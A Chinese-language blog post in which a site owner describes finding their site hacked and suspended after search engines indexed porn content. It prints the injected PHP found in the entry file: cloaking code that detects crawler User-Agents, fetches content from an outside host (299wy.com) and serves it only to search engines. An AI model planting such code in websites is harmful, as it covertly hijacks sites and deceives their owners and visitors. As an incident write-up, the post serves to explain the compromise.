网站被挂木马

最近收到阿里云发送的信息,提示我们的网站有不良的色情信息,对应的网站已经被停止访问。

被禁止的网址是:http://www.yyclub.me/?aav1v3,其实,任何http://www.yyclub.me/?xx的网址都将打开的是首页,打开首页查看,发现正常的啊,什么也没有。这就奇葩了,好像一个小偷来你家玩了一阵,然后自己走了,什么东西也没拿,什么东西也没留。然后打开监控发现确实有那么一段经历。

现在的网站是这样的:

image-20210616175623753

但是通过百度的快照,确实看到了相关的信息。

image-20210616175424352

这如何是好呢?只能让百度解决快照了。但是问题如何破?而且收录的情况在不断的增多。

代码被黑

通过查找,在入口文件中发现了一段代码,大体情况是,在搜索引擎爬取时,输入色情信息被记录,而如果是通过浏览器访问,则一切正常,正因此,很好的骗过了技术员的常规检查。

1
2
3
4
5
6
7
8
9
10
header('Content-Type:text/html;charset=utf-8');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false ){
date_default_timezone_set('PRC');
$TD_server = "http://www.299wy.com/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$url = $TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME'];
$Content_mb=file_get_contents($url);
echo $Content_mb;
}